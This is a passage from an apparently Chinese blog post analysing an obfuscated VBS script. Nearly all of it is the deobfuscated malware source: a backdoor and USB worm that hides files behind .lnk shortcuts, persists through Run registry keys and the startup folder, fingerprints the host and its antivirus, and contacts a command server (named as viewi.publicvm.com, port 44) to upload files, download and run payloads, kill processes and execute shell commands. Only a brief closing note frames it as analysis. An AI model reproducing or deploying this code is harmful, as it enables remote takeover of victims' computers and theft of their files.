> 0 then if drive.drivetype = 1 thenfor each file in filesystemobj.getfolder ( drive.path & "\").fileson error resume nextif instr (file.name,".") thenif lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" thenfile.attributes = 0if ucase (file.name) <> ucase (installname) thenfilename = split(file.name,".")filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )elsefilesystemobj.deletefile (drive.path & "\" & file.name)end Ifelsefilesystemobj.deletefile (file.path) end ifend ifnextfor each folder in filesystemobj.getfolder( drive.path & "\" ).subfoldersfolder.attributes = 0next end if end if end if next wscript.quit end subfunction post (cmd ,param)post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end functionfunction information on error resume next if inf = "" theninf = hwid & spliter inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter inf = inf & shellobj.expandenvironmentstrings("%username%") & spliterset root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")set os = root.execquery ("select * from win32_operatingsystem")for each osinfo in osinf = inf & osinfo.caption & spliter exit fornextinf = inf & "plus" & spliterinf = inf & security & spliterinf = inf & usbspreadinginformation = inf elseinformation = inf end if end functionsub upstart () on error resume Nextshellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,trueend subfunction hwid on error resume nextset root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disksif disk.volumeserialnumber <> "" thenhwid = disk.volumeserialnumberexit forend if next end functionfunction security on error resume nextsecurity = ""set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitemsversionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for x = 1 to ubound (versionstr)osversion = osversion & versionstr (i) next osversion = eval (osversion) if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)for each objantivirus in colantivirussecurity = security & objantivirus.displayname & " ." next if security = "" then security = "nan-av" end functionfunction instance on error resume nextusbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") if usbspreading = "" thenif lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) thenusbspreading = "true - " & dateshellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"elseusbspreading = "false - " & dateshellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"end if end Ifupstart set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort = filesystemobj.getfile (installdir & installname) if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if err.number > 0 then wscript.quit end functionsub sitedownloader (fileurl,filename)strlink = fileurl strsaveto = installdir & filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.sendset objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) thenobjfsodownload.deletefile (strsaveto) end ifif objhttpdownload.status = 200 thendim objstreamdownloadset objstreamdownload = createobject("adodb.stream")with objstreamdownload.type = 1 .open.write objhttpdownload.responsebody.savetofile strsaveto.closeend withset objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) thenshellobj.run objfsodownload.getfile (strsaveto).shortpath end if end subsub download (fileurl,filedir)if filedir = "" then filedir = installdir end ifstrsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send ""set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) thenobjfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 thendim objstreamdownloadset objstreamdownload = createobject("adodb.stream")with objstreamdownload .type = 1 .open.write objhttpdownload.responsebody.savetofile strsaveto.closeend withset objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) thenshellobj.run objfsodownload.getfile (strsaveto).shortpath end if end subfunction upload (fileurl)dim httpobj,objstreamuploade,buffer set objstreamuploade = createobject("adodb.stream") with objstreamuploade .type = 1 .open.loadfromfile fileurlbuffer = .read.close end with set objstreamdownload = nothing set httpobj = createobject("msxml2.xmlhttp") httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false httpobj.send buffer end functionfunction enumdriver ()for each drive in filesystemobj.drives if drive.isready = true thenenumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter end if next end Functionfunction enumfaf (enumdir)enumfaf = enumdir & spliter for each folder in filesystemobj.getfolder (enumdir).subfoldersenumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter nextfor each file in filesystemobj.getfolder (enumdir).filesenumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliternext end functionfunction enumprocess ()on error resume nextset objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process",,48)dim objitem for each objitem in colitemsenumprocess = enumprocess & objitem.name & "|"enumprocess = enumprocess & objitem.processid & "|"enumprocess = enumprocess & objitem.executablepath & spliter next end functionsub exitprocess (pid) on error resume nextshellobj.run "taskkill /F /T /PID " & pid,7,true end subsub deletefaf (url) on error resume nextfilesystemobj.deletefile url filesystemobj.deletefolder urlend subfunction cmdshell (cmd)dim httpobj,oexec,readallfromanyset oexec = shellobj.exec ("%comspec% /c " & cmd) if not oexec.stdout.atendofstream thenreadallfromany = oexec.stdout.readall elseif not oexec.stderr.atendofstream thenreadallfromany = oexec.stderr.readall else readallfromany = "" end ifcmdshell = readallfromany end function

很明顯是個后門，連接的cc服務器為
host = “viewi.publicvm.com”
port = 44，通過post回傳數據，流量沒有加密，

總結

以上是生活随笔為你收集整理的vbs混淆脚本分析的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。